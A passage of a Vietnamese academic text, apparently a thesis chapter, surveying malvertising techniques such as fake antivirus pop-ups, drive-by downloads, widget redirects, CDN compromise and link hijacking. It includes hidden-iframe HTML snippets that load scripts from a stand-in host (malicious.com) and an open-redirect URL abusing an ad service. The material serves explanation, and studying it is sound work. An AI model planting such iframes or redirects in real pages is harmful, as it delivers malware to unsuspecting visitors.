Bằng cách truy cập các trang web bị ảnh hưởng bởi quảng cáo độc hại, người sử dụng có nguy cơ bị lây nhiễm. Có rất nhiều phương pháp khác nhau được sử dụng để tiêm chích quảng cáo hoặc chương trình độc hại vào các trang web:
2.3.1. Quảng cáo pop-up cho tải lừa đảo
Chẳng hạn như các chương trình chống virus giả mạo mà cài đặt phần mềm độc hại trên máy tính hay đơn giản chỉ là các cửa sổ bật lên (pop-up) giả mạo hiển thị máy tính của bạn đang bị nhiễm virus và yêu cầu người dùng phải
cài đặt các phần mềm khác để diệt virus. Nó sẽ hiển thị liên tục khiến người dùng rất khó chịu và hoang mang nhưng nếu người dùng bấm vào cài đặt thêm phần mềm có thể sẽ bị cài mã độc hoặc các phần mềm độc hại trên máy tính người dùng.
Kiểu quảng cáo này cũng thường xuyên xuất hiện đối với thiết bị di động khi người dùng điện thoại truy cập vào các website từ các ứng dụng duyệt web mặc định, hay những ứng dụng như Uc Browser, Firefox và Chrome để đọc báo thì thiết bị của người dùng hiện ra một bảng thông báo rằng: “Trên thiết bị đang ẩn chứa rất nhiều virus, mã độc, bạn cần cài thêm một ứng dụng khác để có thể quét sạch hoàn toàn và sửa chữa thiết bị của bạn”.
2.3.2. Trong văn bản hoặc trong nội dung quảng cáo
Quảng cáo trong văn bản là một hình thức quảng cáo trực tuyến, trong đó nhà điều hành trang web cho phép cho các dịch vụ quảng cáo liên kết từ khóa trong blog của họ hoặc những nội dung khác với các trang web của công ty quảng cáo. Các từ được gạch chân đôi trong quảng cáo trực tuyến được gọi là quảng cáo trong văn bản.
Hình 2.1: Minh hoạ quảng cáo trong văn bản 2.3.3. Tải về tự động (Drive-by Download)
Tải về tự động làm việc thông qua việc khai thác lỗ hổng trình duyệt, các thành phần plug-in trên trình duyệt. Chúng có thể diễn ra theo một số cách thức khác nhau và bạn có khi vẫn đang lướt web trong khi phần mềm độc hại tự động được tải về máy. Trang web nguồn lây nhiễm có thể là do chính các hacker tạo ra hoặc cũng có thể là trang web hợp pháp bị hacker xâm nhập thông qua lỗ hổng của web.
Đôi khi, tải về tự động còn đưa ra nhắc nhở người dùng chấp nhận một hành động cho phép phần mềm độc hại hoạt động trên máy tính. Ví dụ phổ biến
nhất là cài đặt và sử dụng phần mềm độc hại giả mạo. Bạn truy cập vào một trang web và đột nhiên một cửa sổ pop-up trông giống một chương trình chống virus hợp pháp xuất hiện trên máy tính, nó chỉ ra rằng đã phát hiện ra một loại virus và yêu cầu bạn kích vào đây để quét virus miễn phí.
Hình 2.2. Mô hình hoạt động của tải về tự động (Nguồn:http://quantrimang.com)
2.3.4. Thành phần giao diện
Để cài đặt các thành phần giao diện (widget), các lĩnh vực xuất bản yêu cầu một số bước được thực hiện bởi một người sử dụng để tạo điều kiện khả năng của widget bao gồm nội dung của bên thứ ba [3]. Cụ thể:
- Các thành phần giao diện chỉ có thể được cài đặt sau khi đăng ký. Người sử dụng chọn các mã thành phần giao diện dựa trên nền tảng mục tiêu - chẳng hạn như blogger, MySpace,... trong đó các thành phần giao diện sẽ được cài đặt.
- Sau khi đăng ký xong, nhà xuất bản yêu cầu người dùng đăng nhập vào trang web hoặc blog của mình như vậy việc cài đặt thành phần giao diện có thể được hoàn thành. Sau khi cài đặt, các nhà xuất bản bắt đầu gửi tin tức và quảng cáo tới trang web người đã đăng ký.
- Sau khi thành phần giao diện được nhúng trong trang web của người dùng, người sử dụng có thể nhận được nội dung ngẫu nhiên từ các nhà cung cấp nội dung khác nhau thông qua một khu vực quảng cáo dễ bị tổn thương mà hoạt động như một nhà cung cấp dịch vụ trung gian.
Đối với mục đích quảng cáo, khu vực xuất bản dễ bị tổn thương sử dụng các liên kết chuyển hướng để quảng cáo trên trang web của nhà xuất bản. Tuy nhiên, lưu lượng truy cập web có thể dễ dàng chuyển từ nơi thành phần giao diện được cài đặt tới bất kỳ khu vực nào. Điều này cho thấy thành phần giao diện trong bất kỳ khu vực ngẫu nhiên có thể dẫn đến chuyển hướng lưu lượng truy cập từ trang web của một nhà xuất bản dễ bị tổn thương thông qua các liên kết quảng cáo. Những kẻ tấn công có thể khai thác kịch bản này bằng cách thực hiện ba bước sau:
- Bước 1: Những kẻ tấn công như là một người sử dụng hợp pháp (theo thứ tự để có được một thành phần giao điện để đưa vào một số khu vực) như hình sau:
Hình 2.3: Đăng ký một widget trên lỗ hổng vùng quảng cáo
Các thành phần giao diện là bao gồm trong cùng một khu vực như thể hiện hình sau:
Hình 2.4: Widget được cài đặt
- Bước 2: Những kẻ tấn công có thể kích hoạt dễ bị tổn thương dường như đã chết thông qua các siêu liên kết bằng cách kích hoạt URL từ khu vực xuất bản dễ bị tổn thương như sau, nơi 'outbrain.com' là một khu vực quảng cáo dễ bị tổn thương và 'xsstesting-blog là một blog mà phục vụ phần mềm độc hại:
http://outbrain.com/mostviewedaction?sourceUrl=http://www.xsstestingblog.blo gspot.com
- Bước 3: Những người sử dụng đi đến các thành phần giao diện nghĩ rằng họ đang đi vào trang web của nhà xuất bản thấy mình chuyển hướng đến trang web của kẻ tấn công. Một cuộc tấn công thành công có thể được xem như là một cơ chế đáp ứng yêu cầu trong hình sau:
Hình 2.5: Nạn nhân trình duyệt được chuyển hướng đến vùng độc hại
Cuộc tấn công này là kết quả của một lỗi thiết kế trong việc thực hiện vật dụng. Những kẻ tấn công có thể khai thác kịch bản này bằng cách tạo ra các quảng cáo độc hại (sử dụng tên của nhà xuất bản) được nhúng với các URL chuyển hướng mà khai thác lỗi thiết kế trong lĩnh vực xuất bản dễ bị tổn thương để thực hiện chuyển hướng về phía miền độc hại. Điều này cho thấy làm thế nào một vật dụng quảng cáo dễ bị tổn thương có thể bị phá vỡ bởi một kẻ tấn công.
2.3.5. iframe ẩn
Iframe ẩn là một cách để những kẻ tấn công để ẩn các đối tượng được sử dụng để phát tán phần mềm độc hại. Đặc tả HTTP bao gồm iframe để nhúng một trang web vào một trang web khác. Iframe có thể được sử dụng để tải nội dung động cho quảng cáo. Chức năng này của iframe có thể được khai thác để kích hoạt lây nhiễm. Iframe được sử dụng rộng rãi để bỏ qua Same Origin Policy (SOP) và khởi động Cross Domain Attack (CDA). Những kẻ tấn công có thể dễ dàng nhúng iframe ẩn mà phục vụ quảng cáo độc hại để lây lan phần mềm độc hại trong khi tương tác với người sử dụng hợp pháp.
Thông thường, các iframe được khai thác bằng cách sử dụng các thủ tục sau đây để chạy mã độc hại:
- Các kịch bản trong iframe được phép thực hiện trong ngữ cảnh của quá trình trình duyệt (ngữ cảnh càng mạnh hơn, lỗ hổng lớn hơn có thể được khai thác).
- Không có đặc tả an ninh giới hạn sử dụng Active X.
- Chuyển hướng trình duyệt có thể được thực hiện dễ dàng thông qua iframe.
- Truy cập đến các đối tượng cục bộ không bị hạn chế hoàn toàn.
Các iframe ẩn được sử dụng cho quảng cáo độc hại được xây dựng như sau:
<iframe src=“http://www.malicious.com/mal_ad.js” width=1 height=1 style=“visibility:hidden;position:absolute”></iframe>
<iframe src=http://www.malicious.com/software_ad.js width=0 height=0></iframe>
Ngoài ra, kẻ tấn công có thể che giấu mục đích độc hại của họ sử dụng kỹ thuật Javascript để mã hóa các liên kết độc hại. Iframe có một khiếm khuyết mặc định được thừa kế của hạn chế mối quan hệ tin cậy giữa các khu vực khác nhau
được giao tiếp với nhau. Các mối quan hệ tin cậy không thể xác định được tất cả thời gian trong các khu vực khác nhau được chia sẻ nội dung.
Không có khả năng xác định chính xác sự tin cậy là lý do tại sao nó là rất khó để hạn chế hiện nội dung trong iframe và lý do tại sao nó được thực hiện trong ngữ cảnh của trang web phần tử cấp trên. Những kẻ tấn công tải quảng cáo độc hại trong iframe để chạy trong khu vực phần tử cấp trên lây nhiễm trực tiếp như vậy quá trình phát hiện trở nên khó khăn hơn.
2.3.6.Mạngphân phối nội dung
Một mạng phân phối nội dung (CDN) là một máy chủ quảng cáo của bên thứ ba cung cấp nội dung tới các khu vực khác nhau trên web. CDN là sự lựa chọn ưa thích cho những kẻ tấn công để lây lan phần mềm độc hại bằng cách khai thác các máy chủ web CDN - những kẻ tấn công có thể đơn giản là cho phép các máy chủ hỗ trợ trong việc phổ biến các phần mềm độc hại. Quảng cáo sử dụng Flash, Silverlight, pop-up, các tập tin Windows Media Player và Javascript một cách rộng rãi.
Tuy nhiên, đây là một mối quan tâm nghiêm trọng bởi vì nếu một máy chủ CDN được khai thác, kẻ tấn công có thể tiêm mã độc vào các hình thức quảng cáo và mã được phân phối rộng rãi. Có một phản ứng dây chuyền bởi vì nếu một máy chủ phần tử cấp trên bị nhiễm, các nút con cũng sẽ tự động bị lây nhiễm. Hư hỏng một máy chủ phục vụ hàng ngàn các trang web lan truyền quảng cáo độc hại rộng rãi và thường xuyên một cách đáng tin cậy.
Việc xác định các tập tin Windows Media Player đang được sử dụng trong quảng cáo độc hại cho lây lan phần mềm độc hại. Một kẻ tấn công có thể thực hiện các bước sau để thiết kế và tiêm vào các file .wmv độc hại như là quảng cáo độc hại:
- Bước 1: Kẻ tấn công 'cửa sau' các tập tin .wmv sử dụng Windows Script Editor, với mã độc hại, được thực hiện thông qua cuộc tấn công (XSS) Cross Site Scripting.
Hình 2.6: Thiết kế tập tin backdoor .wmv
- Bước 2: Kẻ tấn công tiêm tập tin .wmv này trong một iframe và tiêm vào đoạn mã trong một khu vực CDN dễ bị tổn thương. Khi tập tin này được phân phối qua các khu vực, nó bắt đầu lây lan các tập tin XSS độc hại và vượt qua các bộ lọc Internet Explorer XSS. Như vậy, CDN có tiềm năng trở thành một vấn đề lớn đối với các phần mềm độc hại với web.
Hình 2.7: Tập tin WMV lây lan tập tin VBScript độc hại
2.3.7. Biểu ngữ độc hại
Quảng cáo biểu ngữ được sử dụng rộng rãi để lây lan rộng rãi. Chủ yếu, những kẻ tấn công khai thác máy chủ mà lưu trữ một số trang web trên một máy chủ duy nhất - một kịch bản phổ biến. Như trên, tấn công các máy chủ một cách dễ dàng để lây nhiễm một số lượng lớn các trang web. Ngoài ra, từ các quảng cáo biểu ngữ trên diện rộng, một cuộc tấn công thông qua chúng cũng sẽ được phổ biến rộng rãi. Trong cuộc tấn công này, những kẻ tấn công khai thác một lỗ hổng XSS hay SQL injection trong các trang web được lưu trữ trên máy chủ để có toàn quyền kiểm soát. Những kẻ tấn công sau đó sử dụng hai kỹ thuật cụ thể để lây nhiễm các trang web với các biểu ngữ độc hại như sau:
- Những kẻ tấn công cập nhật cơ sở dữ liệu với iframe độc hại bằng cách khai thác tiêm SQL để kích hoạt lây nhiễm ổn định.
- Những kẻ tấn công thỏa hiệp máy chủ lưu trữ chia sẻ và sử dụng kịch bản tự động để làm cho mã độc hại trên trang web chính của các host khác nhau. Khi người dùng truy cập một trang web cụ thể, biểu ngữ độc hại được hiển thị cùng với nội dung động. Nhấp chuột vào các biểu ngữ và người sử dụng bị lây nhiễm, hoặc chỉ đơn giản là hiển thị các biểu ngữ có thể dẫn đến lây nhiễm.
2.3.8. Quảng cáo của bên thứ ba
Ở đây nói đến vai trò của các mạng quảng cáo (máy chủ quảng cáo). Thông thường, các trang web có liên quan đến quảng cáo của bên thứ ba là nội dung, phương tiện truyền thông hoặc các trang web truyền thông xã hội có thể kiếm được tiền thông qua quảng cáo. Các kỹ thuật của bên thứ ba là nhà quảng cáo muốn đặt quảng cáo trên các trang web để tiếp cận đối tượng của nó. Tuy nhiên, nhiều nhà quảng cáo không có những công cụ để phục vụ quảng cáo của mình, hoặc các nhà xuất bản không muốn bán quảng cáo trực tiếp cho các nhà quảng cáo. Do đó, có sự xuất hiện và tham gia của các máy chủ quảng cáo của bên thứ ba, kết nối giữa nhà quảng cáo và nhà xuất bản quảng cáo.
2.3.9. Các ứng dụng của bên thứ ba
Chẳng hạn như diễn đàn, các hệ trợ giúp, CRM (customer relationship management) và CMS (content management systems) và các ứng dụng khác ngoài ứng dụng web có thể bị khai thác lỗ hổng nếu không được vá đúng cách. Khi cài đặt phần mềm nếu không cẩn thận người dùng sẻ gặp rắc rối với các phần mềm ăn theo của bên thứ 3 như các phần mềm adware (phần mềm quảng cáo), các ứng dụng mà không mong muốn có thể theo dõi người dùng hoặc bị thêm vào các công cụ (tool bar) ở trình duyệt web. Phần lớn các trường hợp thêm vào ứng dụng của bên thứ ba là nguy hại cho người dùng vì vậy người dùng nên lưu ý khi cài đặt các phần mềm vì khi dính phải các ứng dụng, hay các phần mềm ấy chúng ta sẻ thấy vô cùng khó chịu và khó có thể loại bỏ hoàn toàn khỏi hệ thống.
2.3.10. Cướp liên kết
Cướp liên kết cho phép quảng cáo tự động chuyển hướng người sử dụng tới website mà họ không có ý muốn thăm. Các kịch bản quảng cáo không thể truy nhập Document Object Model (DOM) của trang web của nhà xuất bản vì vi phạm Same-Origin Policy (SOP). Tuy nhiên, kịch bản độc hại được chứa trong một quảng cáo có thể chuyển hướng toàn bộ các trang tới đích đã được lựa chọn trước bằng cách thiết lập biến top.location trong Browser Object Model (BOM). Bằng cách này, các nạn nhân được chuyển đến một vị trí tùy ý và không được lựa chọn theo như ý ban đầu.